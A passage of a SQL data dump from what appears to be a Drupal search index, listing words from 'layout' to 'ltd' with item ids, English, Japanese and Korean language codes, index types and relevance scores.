('layout', 45, 'en', 'help_search', 4),
('layout', 45, 'ja', 'help_search', 4),
('layout', 45, 'ko', 'help_search', 4),
('layouts', 6, 'en', 'help_search', 1.98902),
('layouts', 6, 'ja', 'help_search', 1.98902),
('layouts', 6, 'ko', 'help_search', 1.98902),
('layouts', 29, 'en', 'help_search', 2.97685),
('layouts', 29, 'ja', 'help_search', 2.97685),
('layouts', 29, 'ko', 'help_search', 2.97685),
('layouts', 48, 'en', 'help_search', 1),
('layouts', 48, 'ja', 'help_search', 1),
('layouts', 48, 'ko', 'help_search', 1),
('lead', 173, 'en', 'node_search', 1),
('lead', 189, 'en', 'node_search', 27),
('lead', 190, 'en', 'node_search', 27),
('leadership', 120, 'en', 'node_search', 1),
('leading', 25, 'en', 'node_search', 1),
('leading', 43, 'en', 'help_search', 1),
('leading', 43, 'ja', 'help_search', 1),
('leading', 43, 'ko', 'help_search', 1),
('leads', 20, 'en', 'help_search', 1),
('leads', 20, 'ja', 'help_search', 1),
('leads', 20, 'ko', 'help_search', 1),
('leads', 196, 'en', 'node_search', 27),
('leap', 204, 'en', 'node_search', 4),
('leap', 204, 'ja', 'node_search', 4),
('learn', 1, 'en', 'node_search', 1),
('learn', 3, 'en', 'node_search', 1),
('learn', 3, 'ko', 'node_search', 1),
('learn', 16, 'en', 'help_search', 1),
('learn', 16, 'ja', 'help_search', 1),
('learn', 16, 'ko', 'help_search', 1),
('learn', 28, 'en', 'node_search', 3),
('learn', 41, 'en', 'help_search', 2),
('learn', 41, 'ja', 'help_search', 2),
('learn', 41, 'ko', 'help_search', 2),
('learn', 66, 'en', 'node_search', 1),
('learn', 76, 'en', 'help_search', 1),
('learn', 76, 'ja', 'help_search', 1),
('learn', 76, 'ko', 'help_search', 1),
('learn', 77, 'en', 'node_search', 4),
('learn', 87, 'en', 'node_search', 3),
('learners', 66, 'en', 'node_search', 1),
('learning', 20, 'en', 'help_search', 1),
('learning', 20, 'ja', 'help_search', 1),
('learning', 20, 'ko', 'help_search', 1),
('learning', 23, 'en', 'node_search', 0.863659),
('learning', 62, 'en', 'node_search', 2),
('learning', 66, 'en', 'node_search', 3.96109),
('learning', 67, 'ja', 'node_search', 2),
('learning', 135, 'en', 'node_search', 1),
('learning', 142, 'en', 'node_search', 1),
('learning', 164, 'en', 'node_search', 1),
('learning', 182, 'en', 'node_search', 28),
('learning', 183, 'en', 'node_search', 5),
('learning', 184, 'en', 'node_search', 1),
('learning', 191, 'en', 'node_search', 1),
('learning', 195, 'en', 'node_search', 1),
('learning', 199, 'en', 'node_search', 1),
('least', 3, 'en', 'node_search', 1),
('least', 3, 'ko', 'node_search', 1),
('least', 4, 'en', 'node_search', 3),
('least', 4, 'ja', 'node_search', 3),
('least', 18, 'en', 'node_search', 1),
('least', 18, 'ko', 'node_search', 1),
('least', 31, 'en', 'node_search', 0.909743),
('least', 46, 'en', 'help_search', 1),
('least', 46, 'ja', 'help_search', 1),
('least', 46, 'ko', 'help_search', 1),
('least', 89, 'en', 'help_search', 1),
('least', 89, 'ja', 'help_search', 1),
('least', 89, 'ko', 'help_search', 1),
('least', 92, 'en', 'help_search', 1),
('least', 92, 'ja', 'help_search', 1),
('least', 92, 'ko', 'help_search', 1),
('leave', 7, 'en', 'help_search', 1),
('leave', 7, 'ja', 'help_search', 1),
('leave', 7, 'ko', 'help_search', 1),
('leave', 59, 'en', 'help_search', 1),
('leave', 59, 'ja', 'help_search', 1),
('leave', 59, 'ko', 'help_search', 1),
('led', 133, 'en', 'node_search', 1),
('left', 8, 'en', 'node_search', 2),
('left', 10, 'en', 'help_search', 2),
('left', 10, 'ja', 'help_search', 2),
('left', 10, 'ko', 'help_search', 2),
('left', 22, 'en', 'help_search', 2),
('left', 22, 'ja', 'help_search', 2),
('left', 22, 'ko', 'help_search', 2),
('left', 43, 'en', 'help_search', 1),
('left', 43, 'ja', 'help_search', 1),
('left', 43, 'ko', 'help_search', 1),
('left', 61, 'en', 'help_search', 1),
('left', 61, 'ja', 'help_search', 1),
('left', 61, 'ko', 'help_search', 1),
('left', 69, 'en', 'help_search', 0.976851),
('left', 69, 'ja', 'help_search', 0.976851),
('left', 69, 'ko', 'help_search', 0.976851),
('left', 81, 'en', 'help_search', 1),
('left', 81, 'ja', 'help_search', 1),
('left', 81, 'ko', 'help_search', 1),
('left', 82, 'en', 'help_search', 1),
('left', 82, 'ja', 'help_search', 1),
('left', 82, 'ko', 'help_search', 1),
('length', 67, 'en', 'help_search', 5),
('length', 67, 'ja', 'help_search', 5),
('length', 67, 'ko', 'help_search', 5),
('less', 72, 'en', 'help_search', 1),
('less', 72, 'ja', 'help_search', 1),
('less', 72, 'ko', 'help_search', 1),
('lesson', 122, 'en', 'node_search', 1),
('lesson', 142, 'en', 'node_search', 1),
('let', 39, 'en', 'help_search', 1),
('let', 39, 'ja', 'help_search', 1),
('let', 39, 'ko', 'help_search', 1),
('let', 41, 'en', 'help_search', 1),
('let', 41, 'ja', 'help_search', 1),
('let', 41, 'ko', 'help_search', 1),
('let', 62, 'en', 'node_search', 0.822065),
('let', 66, 'en', 'node_search', 0.923838),
('let', 80, 'en', 'help_search', 1),
('let', 80, 'ja', 'help_search', 1),
('let', 80, 'ko', 'help_search', 1),
('let', 87, 'en', 'node_search', 1),
('let', 93, 'en', 'help_search', 1),
('let', 93, 'ja', 'help_search', 1),
('let', 93, 'ko', 'help_search', 1),
('letraset', 204, 'en', 'node_search', 4),
('letraset', 204, 'ja', 'node_search', 4),
('lets', 41, 'en', 'help_search', 1),
('lets', 41, 'ja', 'help_search', 1),
('lets', 41, 'ko', 'help_search', 1),
('letting', 11, 'en', 'help_search', 0.934703),
('letting', 11, 'ja', 'help_search', 0.934703),
('letting', 11, 'ko', 'help_search', 0.934703),
('level', 4, 'en', 'node_search', 1),
('level', 4, 'ja', 'node_search', 1),
('level', 24, 'en', 'node_search', 1),
('level', 31, 'en', 'node_search', 1),
('level', 66, 'en', 'help_search', 1),
('level', 66, 'en', 'node_search', 1),
('level', 66, 'ja', 'help_search', 1),
('level', 182, 'en', 'node_search', 1),
('levels', 183, 'en', 'node_search', 1),
('librarian', 204, 'en', 'node_search', 4),
('librarian', 204, 'ja', 'node_search', 4),
('library', 23, 'en', 'help_search', 2),
('library', 23, 'ja', 'help_search', 2),
('library', 23, 'ko', 'help_search', 2),
('library', 35, 'en', 'help_search', 25),
('library', 35, 'ja', 'help_search', 25),
('library', 35, 'ko', 'help_search', 25),
('library', 204, 'en', 'node_search', 4),
('library', 204, 'ja', 'node_search', 4),
('licence', 27, 'en', 'node_search', 1),
('license', 23, 'en', 'node_search', 1),
('licensed', 66, 'en', 'node_search', 1),
('life', 174, 'en', 'node_search', 1),
('life', 175, 'en', 'node_search', 1),
('life', 188, 'en', 'node_search', 1),
('lifetime', 37, 'en', 'help_search', 4.86055),
('lifetime', 37, 'ja', 'help_search', 4.86055),
('lifetime', 37, 'ko', 'help_search', 4.86055),
('like', 2, 'en', 'help_search', 1),
('like', 2, 'ja', 'help_search', 1),
('like', 2, 'ko', 'help_search', 1),
('like', 11, 'en', 'help_search', 1),
('like', 11, 'ja', 'help_search', 1),
('like', 11, 'ko', 'help_search', 1),
('like', 22, 'en', 'help_search', 1),
('like', 22, 'ja', 'help_search', 1),
('like', 22, 'ko', 'help_search', 1),
('like', 39, 'en', 'help_search', 2),
('like', 39, 'ja', 'help_search', 2),
('like', 39, 'ko', 'help_search', 2),
('like', 50, 'en', 'help_search', 2),
('like', 50, 'ja', 'help_search', 2),
('like', 50, 'ko', 'help_search', 2),
('like', 64, 'en', 'help_search', 1),
('like', 64, 'ja', 'help_search', 1),
('like', 64, 'ko', 'help_search', 1),
('like', 68, 'en', 'help_search', 1),
('like', 68, 'ja', 'help_search', 1),
('like', 68, 'ko', 'help_search', 1),
('like', 69, 'en', 'help_search', 1),
('like', 69, 'ja', 'help_search', 1),
('like', 69, 'ko', 'help_search', 1),
('like', 80, 'en', 'help_search', 1),
('like', 80, 'ja', 'help_search', 1),
('like', 80, 'ko', 'help_search', 1),
('like', 89, 'en', 'help_search', 2),
('like', 89, 'ja', 'help_search', 2),
('like', 89, 'ko', 'help_search', 2),
('like', 93, 'en', 'help_search', 0.923838),
('like', 93, 'ja', 'help_search', 0.923838),
('like', 93, 'ko', 'help_search', 0.923838),
('like', 160, 'en', 'node_search', 1),
('limit', 7, 'en', 'help_search', 1),
('limit', 7, 'ja', 'help_search', 1),
('limit', 7, 'ko', 'help_search', 1),
('limit', 24, 'en', 'help_search', 1),
('limit', 24, 'ja', 'help_search', 1),
('limit', 24, 'ko', 'help_search', 1),
('limit', 27, 'en', 'help_search', 2),
('limit', 27, 'ja', 'help_search', 2),
('limit', 27, 'ko', 'help_search', 2),
('limit', 28, 'en', 'help_search', 1),
('limit', 28, 'ja', 'help_search', 1),
('limit', 28, 'ko', 'help_search', 1),
('limit', 93, 'en', 'help_search', 1),
('limit', 93, 'ja', 'help_search', 1),
('limit', 93, 'ko', 'help_search', 1),
('limitations', 68, 'en', 'help_search', 20),
('limitations', 68, 'ja', 'help_search', 20),
('limitations', 68, 'ko', 'help_search', 20),
('limited', 69, 'en', 'help_search', 1),
('limited', 69, 'ja', 'help_search', 1),
('limited', 69, 'ko', 'help_search', 1),
('limits', 28, 'en', 'help_search', 1),
('limits', 28, 'ja', 'help_search', 1),
('limits', 28, 'ko', 'help_search', 1),
('limits', 47, 'en', 'help_search', 1),
('limits', 47, 'ja', 'help_search', 1),
('limits', 47, 'ko', 'help_search', 1),
('lin', 113, 'en', 'node_search', 2),
('lin', 113, 'ja', 'node_search', 2),
('lin', 121, 'en', 'node_search', 28),
('lin', 121, 'ja', 'node_search', 31),
('lin', 130, 'en', 'node_search', 1),
('lin', 130, 'ja', 'node_search', 1),
('lin', 153, 'en', 'node_search', 1),
('lin', 153, 'ja', 'node_search', 1),
('line', 1, 'en', 'help_search', 1),
('line', 1, 'ja', 'help_search', 1),
('line', 1, 'ko', 'help_search', 1),
('line', 28, 'en', 'help_search', 4),
('line', 28, 'ja', 'help_search', 4),
('line', 28, 'ko', 'help_search', 4),
('link', 19, 'en', 'help_search', 1),
('link', 19, 'ja', 'help_search', 1),
('link', 19, 'ko', 'help_search', 1),
('link', 20, 'en', 'help_search', 1),
('link', 20, 'ja', 'help_search', 1),
('link', 20, 'ko', 'help_search', 1),
('link', 22, 'en', 'help_search', 4.98902),
('link', 22, 'ja', 'help_search', 4.98902),
('link', 22, 'ko', 'help_search', 4.98902),
('link', 28, 'en', 'help_search', 0.949597),
('link', 28, 'ja', 'help_search', 0.949597),
('link', 28, 'ko', 'help_search', 0.949597),
('link', 32, 'en', 'help_search', 1),
('link', 32, 'ja', 'help_search', 1),
('link', 32, 'ko', 'help_search', 1),
('link', 39, 'en', 'help_search', 3),
('link', 39, 'ja', 'help_search', 3),
('link', 39, 'ko', 'help_search', 3),
('link', 42, 'en', 'help_search', 1),
('link', 42, 'ja', 'help_search', 1),
('link', 42, 'ko', 'help_search', 1),
('link', 45, 'en', 'help_search', 1),
('link', 45, 'ja', 'help_search', 1),
('link', 45, 'ko', 'help_search', 1),
('link', 56, 'en', 'help_search', 62),
('link', 56, 'ja', 'help_search', 62),
('link', 56, 'ko', 'help_search', 62),
('link', 69, 'en', 'help_search', 3.95723),
('link', 69, 'ja', 'help_search', 3.95723),
('link', 69, 'ko', 'help_search', 3.95723),
('link', 77, 'en', 'help_search', 2),
('link', 77, 'ja', 'help_search', 2),
('link', 77, 'ko', 'help_search', 2),
('link', 78, 'en', 'help_search', 2),
('link', 78, 'ja', 'help_search', 2),
('link', 78, 'ko', 'help_search', 2),
('link', 88, 'en', 'help_search', 3),
('link', 88, 'ja', 'help_search', 3),
('link', 88, 'ko', 'help_search', 3),
('link', 91, 'en', 'help_search', 5),
('link', 91, 'ja', 'help_search', 5),
('link', 91, 'ko', 'help_search', 5),
('link', 92, 'en', 'help_search', 1),
('link', 92, 'ja', 'help_search', 1),
('link', 92, 'ko', 'help_search', 1),
('links', 22, 'en', 'help_search', 63.989),
('links', 22, 'ja', 'help_search', 63.989),
('links', 22, 'ko', 'help_search', 63.989),
('links', 28, 'en', 'help_search', 3.89272),
('links', 28, 'ja', 'help_search', 3.89272),
('links', 28, 'ko', 'help_search', 3.89272),
('links', 36, 'en', 'help_search', 10),
('links', 36, 'ja', 'help_search', 10),
('links', 36, 'ko', 'help_search', 10),
('links', 39, 'en', 'help_search', 9),
('links', 39, 'ja', 'help_search', 9),
('links', 39, 'ko', 'help_search', 9),
('links', 43, 'en', 'help_search', 3),
('links', 43, 'ja', 'help_search', 3),
('links', 43, 'ko', 'help_search', 3),
('links', 46, 'en', 'help_search', 1),
('links', 46, 'ja', 'help_search', 1),
('links', 46, 'ko', 'help_search', 1),
('links', 55, 'en', 'help_search', 2),
('links', 55, 'ja', 'help_search', 2),
('links', 55, 'ko', 'help_search', 2),
('links', 56, 'en', 'help_search', 2),
('links', 56, 'ja', 'help_search', 2),
('links', 56, 'ko', 'help_search', 2),
('links', 57, 'en', 'help_search', 2),
('links', 57, 'ja', 'help_search', 2),
('links', 57, 'ko', 'help_search', 2),
('links', 58, 'en', 'help_search', 30),
('links', 58, 'ja', 'help_search', 30),
('links', 58, 'ko', 'help_search', 30),
('links', 69, 'en', 'help_search', 28.965),
('links', 69, 'ja', 'help_search', 28.965),
('links', 69, 'ko', 'help_search', 28.965),
('links', 89, 'en', 'help_search', 4),
('links', 89, 'ja', 'help_search', 4),
('links', 89, 'ko', 'help_search', 4),
('links', 91, 'en', 'help_search', 1),
('links', 91, 'ja', 'help_search', 1),
('links', 91, 'ko', 'help_search', 1),
('linuxlike', 32, 'en', 'help_search', 1),
('linuxlike', 32, 'ja', 'help_search', 1),
('linuxlike', 32, 'ko', 'help_search', 1),
('list', 10, 'en', 'help_search', 3),
('list', 10, 'ja', 'help_search', 3),
('list', 10, 'ko', 'help_search', 3),
('list', 16, 'en', 'help_search', 5),
('list', 16, 'ja', 'help_search', 5),
('list', 16, 'ko', 'help_search', 5),
('list', 22, 'en', 'help_search', 1.98217),
('list', 22, 'ja', 'help_search', 1.98217),
('list', 22, 'ko', 'help_search', 1.98217),
('list', 24, 'en', 'help_search', 1),
('list', 24, 'ja', 'help_search', 1),
('list', 24, 'ko', 'help_search', 1),
('list', 25, 'en', 'help_search', 1),
('list', 25, 'ja', 'help_search', 1),
('list', 26, 'en', 'help_search', 1),
('list', 26, 'ja', 'help_search', 1),
('list', 26, 'ko', 'help_search', 1),
('list', 27, 'en', 'help_search', 1.99315),
('list', 27, 'ja', 'help_search', 1.99315),
('list', 27, 'ko', 'help_search', 1.99315),
('list', 30, 'en', 'help_search', 0.827757),
('list', 30, 'ja', 'help_search', 0.827757),
('list', 30, 'ko', 'help_search', 0.827757),
('list', 43, 'en', 'help_search', 1),
('list', 43, 'ja', 'help_search', 1),
('list', 43, 'ko', 'help_search', 1),
('list', 49, 'en', 'help_search', 2),
('list', 49, 'ja', 'help_search', 2),
('list', 49, 'ko', 'help_search', 2),
('list', 55, 'en', 'help_search', 1),
('list', 55, 'ja', 'help_search', 1),
('list', 55, 'ko', 'help_search', 1),
('list', 56, 'en', 'help_search', 2),
('list', 56, 'ja', 'help_search', 2),
('list', 56, 'ko', 'help_search', 2),
('list', 61, 'en', 'help_search', 2),
('list', 61, 'ja', 'help_search', 2),
('list', 61, 'ko', 'help_search', 2),
('list', 64, 'en', 'help_search', 2),
('list', 64, 'ja', 'help_search', 2),
('list', 64, 'ko', 'help_search', 2),
('list', 66, 'en', 'help_search', 2),
('list', 66, 'ja', 'help_search', 2),
('list', 69, 'en', 'help_search', 3.97),
('list', 69, 'ja', 'help_search', 3.97),
('list', 69, 'ko', 'help_search', 3.97),
('list', 74, 'en', 'help_search', 1),
('list', 74, 'ja', 'help_search', 1),
('list', 74, 'ko', 'help_search', 1),
('list', 75, 'en', 'help_search', 2),
('list', 75, 'ja', 'help_search', 2),
('list', 75, 'ko', 'help_search', 2),
('list', 80, 'en', 'help_search', 3),
('list', 80, 'ja', 'help_search', 3),
('list', 80, 'ko', 'help_search', 3),
('list', 83, 'en', 'help_search', 1),
('list', 83, 'ja', 'help_search', 1),
('list', 83, 'ko', 'help_search', 1),
('list', 87, 'en', 'help_search', 1),
('list', 87, 'ja', 'help_search', 1),
('list', 87, 'ko', 'help_search', 1),
('list', 88, 'en', 'help_search', 1),
('list', 88, 'ja', 'help_search', 1),
('list', 88, 'ko', 'help_search', 1),
('list', 89, 'en', 'help_search', 3),
('list', 89, 'ja', 'help_search', 3),
('list', 89, 'ko', 'help_search', 3),
('list', 90, 'en', 'help_search', 1),
('list', 90, 'ja', 'help_search', 1),
('list', 90, 'ko', 'help_search', 1),
('list', 91, 'en', 'help_search', 10),
('list', 91, 'ja', 'help_search', 10),
('list', 91, 'ko', 'help_search', 10),
('list', 92, 'en', 'help_search', 2),
('list', 92, 'ja', 'help_search', 2),
('list', 92, 'ko', 'help_search', 2),
('list', 93, 'en', 'help_search', 3),
('list', 93, 'ja', 'help_search', 3),
('list', 93, 'ko', 'help_search', 3),
('listed', 2, 'en', 'help_search', 1),
('listed', 2, 'ja', 'help_search', 1),
('listed', 2, 'ko', 'help_search', 1),
('listed', 8, 'en', 'help_search', 1),
('listed', 8, 'ja', 'help_search', 1),
('listed', 8, 'ko', 'help_search', 1),
('listed', 11, 'en', 'help_search', 0.860547),
('listed', 11, 'ja', 'help_search', 0.860547),
('listed', 11, 'ko', 'help_search', 0.860547),
('listed', 27, 'en', 'help_search', 1),
('listed', 27, 'ja', 'help_search', 1),
('listed', 27, 'ko', 'help_search', 1),
('listed', 29, 'en', 'help_search', 0.953396),
('listed', 29, 'ja', 'help_search', 0.953396),
('listed', 29, 'ko', 'help_search', 0.953396),
('listed', 30, 'en', 'help_search', 0.687638),
('listed', 30, 'ja', 'help_search', 0.687638),
('listed', 30, 'ko', 'help_search', 0.687638),
('listed', 33, 'en', 'help_search', 1),
('listed', 33, 'ja', 'help_search', 1),
('listed', 33, 'ko', 'help_search', 1),
('listed', 35, 'en', 'help_search', 0.972861),
('listed', 35, 'ja', 'help_search', 0.972861),
('listed', 35, 'ko', 'help_search', 0.972861),
('listed', 36, 'en', 'help_search', 1),
('listed', 36, 'ja', 'help_search', 1),
('listed', 36, 'ko', 'help_search', 1),
('listed', 38, 'en', 'help_search', 1),
('listed', 38, 'ja', 'help_search', 1),
('listed', 38, 'ko', 'help_search', 1),
('listed', 40, 'en', 'help_search', 1),
('listed', 40, 'ja', 'help_search', 1),
('listed', 40, 'ko', 'help_search', 1),
('listed', 41, 'en', 'help_search', 1),
('listed', 41, 'ja', 'help_search', 1),
('listed', 41, 'ko', 'help_search', 1),
('listed', 43, 'en', 'help_search', 0.866793),
('listed', 43, 'ja', 'help_search', 0.866793),
('listed', 43, 'ko', 'help_search', 0.866793),
('listed', 45, 'en', 'help_search', 1),
('listed', 45, 'ja', 'help_search', 1),
('listed', 45, 'ko', 'help_search', 1),
('listed', 46, 'en', 'help_search', 20),
('listed', 46, 'ja', 'help_search', 20),
('listed', 46, 'ko', 'help_search', 20),
('listed', 60, 'en', 'help_search', 1),
('listed', 60, 'ja', 'help_search', 1),
('listed', 60, 'ko', 'help_search', 1),
('listed', 62, 'en', 'help_search', 1),
('listed', 62, 'ja', 'help_search', 1),
('listed', 62, 'ko', 'help_search', 1),
('listed', 65, 'en', 'help_search', 1),
('listed', 65, 'ja', 'help_search', 1),
('listed', 65, 'ko', 'help_search', 1),
('listed', 66, 'en', 'help_search', 1),
('listed', 66, 'ja', 'help_search', 1),
('listed', 67, 'en', 'help_search', 0.886095),
('listed', 67, 'ja', 'help_search', 0.886095),
('listed', 67, 'ko', 'help_search', 0.886095),
('listed', 68, 'en', 'help_search', 0.794753),
('listed', 68, 'ja', 'help_search', 0.794753),
('listed', 68, 'ko', 'help_search', 0.794753),
('listed', 75, 'en', 'help_search', 1),
('listed', 75, 'ja', 'help_search', 1),
('listed', 75, 'ko', 'help_search', 1),
('listed', 80, 'en', 'help_search', 0.906287),
('listed', 80, 'ja', 'help_search', 0.906287),
('listed', 80, 'ko', 'help_search', 0.906287),
('listed', 90, 'en', 'help_search', 1),
('listed', 90, 'ja', 'help_search', 1),
('listed', 90, 'ko', 'help_search', 1),
('listed', 93, 'en', 'help_search', 0.78951),
('listed', 93, 'ja', 'help_search', 0.78951),
('listed', 93, 'ko', 'help_search', 0.78951),
('listen', 87, 'en', 'node_search', 1),
('listening', 62, 'en', 'node_search', 1),
('listing', 80, 'en', 'help_search', 0.976851),
('listing', 80, 'ja', 'help_search', 0.976851),
('listing', 80, 'ko', 'help_search', 0.976851),
('listing', 93, 'en', 'help_search', 2),
('listing', 93, 'ja', 'help_search', 2),
('listing', 93, 'ko', 'help_search', 2),
('listings', 91, 'en', 'help_search', 11.6148),
('listings', 91, 'ja', 'help_search', 11.572),
('listings', 91, 'ko', 'help_search', 11.6148),
('listings', 93, 'en', 'help_search', 35.5437),
('listings', 93, 'ja', 'help_search', 35.5437),
('listings', 93, 'ko', 'help_search', 35.5437),
('lists', 79, 'en', 'help_search', 1),
('lists', 79, 'ja', 'help_search', 1),
('lists', 79, 'ko', 'help_search', 1),
('lists', 80, 'en', 'help_search', 0.968904),
('lists', 80, 'ja', 'help_search', 0.968904),
('lists', 80, 'ko', 'help_search', 0.968904),
('lists', 91, 'en', 'help_search', 1),
('lists', 91, 'ja', 'help_search', 1),
('lists', 91, 'ko', 'help_search', 1),
('little', 5, 'en', 'node_search', 1),
('little', 5, 'ko', 'node_search', 1),
('live', 4, 'en', 'node_search', 1),
('live', 4, 'ja', 'node_search', 1),
('live', 30, 'en', 'help_search', 3.73211),
('live', 30, 'ja', 'help_search', 3.73211),
('live', 30, 'ko', 'help_search', 3.73211),
('lives', 162, 'en', 'node_search', 1),
('lives', 176, 'en', 'node_search', 1),
('living', 5, 'en', 'node_search', 1),
('living', 5, 'ko', 'node_search', 1),
('living', 8, 'en', 'node_search', 2),
('living', 31, 'en', 'node_search', 1),
('load', 37, 'en', 'help_search', 1),
('load', 37, 'ja', 'help_search', 1),
('load', 37, 'ko', 'help_search', 1),
('loads', 70, 'en', 'help_search', 1),
('loads', 70, 'ja', 'help_search', 1),
('loads', 70, 'ko', 'help_search', 1),
('loan', 3, 'en', 'node_search', 1),
('loan', 3, 'ko', 'node_search', 1),
('local', 25, 'en', 'node_search', 1),
('locate', 22, 'en', 'help_search', 1),
('locate', 22, 'ja', 'help_search', 1),
('locate', 22, 'ko', 'help_search', 1),
('locate', 42, 'en', 'help_search', 1),
('locate', 42, 'ja', 'help_search', 1),
('locate', 42, 'ko', 'help_search', 1),
('locate', 55, 'en', 'help_search', 1),
('locate', 55, 'ja', 'help_search', 1),
('locate', 55, 'ko', 'help_search', 1),
('locate', 56, 'en', 'help_search', 2),
('locate', 56, 'ja', 'help_search', 2),
('locate', 56, 'ko', 'help_search', 2),
('locate', 63, 'en', 'help_search', 1),
('locate', 63, 'ja', 'help_search', 1),
('locate', 63, 'ko', 'help_search', 1),
('locate', 65, 'en', 'help_search', 1),
('locate', 65, 'ja', 'help_search', 1),
('locate', 65, 'ko', 'help_search', 1),
('locate', 74, 'en', 'help_search', 1),
('locate', 74, 'ja', 'help_search', 1),
('locate', 74, 'ko', 'help_search', 1),
('locate', 75, 'en', 'help_search', 1),
('locate', 75, 'ja', 'help_search', 1),
('locate', 75, 'ko', 'help_search', 1),
('locate', 77, 'en', 'help_search', 2),
('locate', 77, 'ja', 'help_search', 2),
('locate', 77, 'ko', 'help_search', 2),
('locate', 78, 'en', 'help_search', 1),
('locate', 78, 'ja', 'help_search', 1),
('locate', 78, 'ko', 'help_search', 1),
('located', 1, 'en', 'help_search', 2),
('located', 1, 'ja', 'help_search', 2),
('located', 1, 'ko', 'help_search', 2),
('located', 35, 'en', 'help_search', 1),
('located', 35, 'ja', 'help_search', 1),
('located', 35, 'ko', 'help_search', 1),
('located', 45, 'en', 'help_search', 1),
('located', 45, 'ja', 'help_search', 1),
('located', 45, 'ko', 'help_search', 1),
('location', 30, 'en', 'help_search', 0.774192),
('location', 30, 'ja', 'help_search', 0.774192),
('location', 30, 'ko', 'help_search', 0.774192),
('location', 55, 'en', 'help_search', 1),
('location', 55, 'ja', 'help_search', 1),
('location', 55, 'ko', 'help_search', 1),
('location', 162, 'en', 'node_search', 4),
('locator', 65, 'en', 'help_search', 1),
('locator', 65, 'ja', 'help_search', 1),
('locator', 65, 'ko', 'help_search', 1),
('log', 73, 'en', 'help_search', 1),
('log', 73, 'ja', 'help_search', 1),
('log', 73, 'ko', 'help_search', 1),
('log', 76, 'en', 'help_search', 4),
('log', 76, 'ja', 'help_search', 4),
('log', 76, 'ko', 'help_search', 4),
('log', 84, 'en', 'help_search', 2),
('log', 84, 'ja', 'help_search', 2),
('log', 84, 'ko', 'help_search', 2),
('log', 86, 'en', 'help_search', 2),
('log', 86, 'ja', 'help_search', 2),
('log', 86, 'ko', 'help_search', 2),
('logged', 31, 'ja', 'help_search', 1),
('logged', 37, 'en', 'help_search', 0.997306),
('logged', 37, 'ja', 'help_search', 0.997306),
('logged', 37, 'ko', 'help_search', 0.997306),
('logged', 50, 'en', 'help_search', 1),
('logged', 50, 'ja', 'help_search', 1),
('logged', 50, 'ko', 'help_search', 1),
('logged', 73, 'en', 'help_search', 1),
('logged', 73, 'ja', 'help_search', 1),
('logged', 73, 'ko', 'help_search', 1),
('logged', 84, 'en', 'help_search', 2),
('logged', 84, 'ja', 'help_search', 2),
('logged', 84, 'ko', 'help_search', 2),
('loggedin', 47, 'en', 'help_search', 1),
('loggedin', 47, 'ja', 'help_search', 1),
('loggedin', 47, 'ko', 'help_search', 1),
('logging', 34, 'en', 'help_search', 2),
('logging', 34, 'ja', 'help_search', 2),
('logging', 34, 'ko', 'help_search', 2),
('logging', 72, 'en', 'help_search', 3.73881),
('logging', 72, 'ja', 'help_search', 3.73881),
('logging', 72, 'ko', 'help_search', 3.73881),
('logging', 76, 'en', 'help_search', 1),
('logging', 76, 'ja', 'help_search', 1),
('logging', 76, 'ko', 'help_search', 1),
('loginurl', 86, 'en', 'help_search', 1),
('loginurl', 86, 'ja', 'help_search', 1),
('loginurl', 86, 'ko', 'help_search', 1),
('london', 204, 'en', 'node_search', 4),
('london', 204, 'ja', 'node_search', 4),
('long', 27, 'en', 'node_search', 0.920273),
('long', 30, 'en', 'help_search', 0.869951),
('long', 30, 'ja', 'help_search', 0.869951),
('long', 30, 'ko', 'help_search', 0.869951),
('long', 70, 'en', 'help_search', 1),
('long', 70, 'ja', 'help_search', 1),
('long', 70, 'ko', 'help_search', 1),
('long', 71, 'en', 'help_search', 1),
('long', 71, 'ja', 'help_search', 1),
('long', 71, 'ko', 'help_search', 1),
('longer', 37, 'en', 'help_search', 1),
('longer', 37, 'ja', 'help_search', 1),
('longer', 37, 'ko', 'help_search', 1),
('longer', 78, 'en', 'help_search', 1),
('longer', 78, 'ja', 'help_search', 1),
('longer', 78, 'ko', 'help_search', 1),
('longterm', 162, 'en', 'node_search', 1.91323),
('longterm', 185, 'en', 'node_search', 1),
('longterm', 187, 'en', 'node_search', 1),
('look', 29, 'en', 'help_search', 1),
('look', 29, 'ja', 'help_search', 1),
('look', 29, 'ko', 'help_search', 1),
('look', 53, 'en', 'help_search', 1),
('look', 53, 'ja', 'help_search', 1),
('look', 53, 'ko', 'help_search', 1),
('look', 68, 'en', 'help_search', 1),
('look', 68, 'ja', 'help_search', 1),
('look', 68, 'ko', 'help_search', 1),
('look', 71, 'en', 'help_search', 1),
('look', 71, 'ja', 'help_search', 1),
('look', 71, 'ko', 'help_search', 1),
('look', 92, 'en', 'help_search', 1),
('look', 92, 'ja', 'help_search', 1),
('look', 92, 'ko', 'help_search', 1),
('look', 140, 'en', 'node_search', 1),
('look', 166, 'en', 'node_search', 1),
('look', 178, 'en', 'node_search', 1),
('look', 182, 'en', 'node_search', 1),
('look', 186, 'en', 'node_search', 1),
('look', 187, 'en', 'node_search', 1),
('look', 194, 'en', 'node_search', 1),
('look', 195, 'en', 'node_search', 1),
('look', 197, 'en', 'node_search', 1),
('looking', 31, 'en', 'node_search', 28),
('looking', 62, 'en', 'node_search', 1),
('looking', 66, 'en', 'node_search', 0.98493),
('looks', 22, 'en', 'help_search', 1),
('looks', 22, 'ja', 'help_search', 1),
('looks', 22, 'ko', 'help_search', 1),
('looks', 39, 'en', 'help_search', 1),
('looks', 39, 'ja', 'help_search', 1),
('looks', 39, 'ko', 'help_search', 1),
('looks', 69, 'en', 'help_search', 1),
('looks', 69, 'ja', 'help_search', 1),
('looks', 69, 'ko', 'help_search', 1),
('ltd', 4, 'en', 'node_search', 1),
('ltd', 4, 'ja', 'node_search', 1),
('ltd', 4, 'ko', 'node_search', 1),
('ltd', 5, 'en', 'node_search', 1),
('ltd', 5, 'ja', 'node_search', 0.722831),
('ltd', 5, 'ko', 'node_search', 1),
('ltd', 9, 'en', 'node_search', 28),
('ltd', 9, 'ko', 'node_search', 28),
('ltd', 10, 'en', 'node_search', 1),
('ltd', 10, 'ja', 'node_search', 1),
('ltd', 10, 'ko', 'node_search', 1),
('ltd', 11, 'en', 'node_search', 16),
('ltd', 17, 'en', 'node_search', 30),
('ltd', 17, 'ko', 'node_search', 30),
('ltd', 18, 'en', 'node_search', 1),
('ltd', 18, 'ja', 'node_search', 0.879565),
('ltd', 18, 'ko', 'node_search', 1),
('ltd', 19, 'en', 'node_search', 1),
('ltd', 19, 'ko', 'node_search', 1),
('ltd', 23, 'en', 'node_search', 5.87634),
('ltd', 23, 'ko', 'node_search', 0.781775),
('ltd', 27, 'en', 'node_search', 17.6623),
('ltd', 30, 'en', 'node_search', 1),
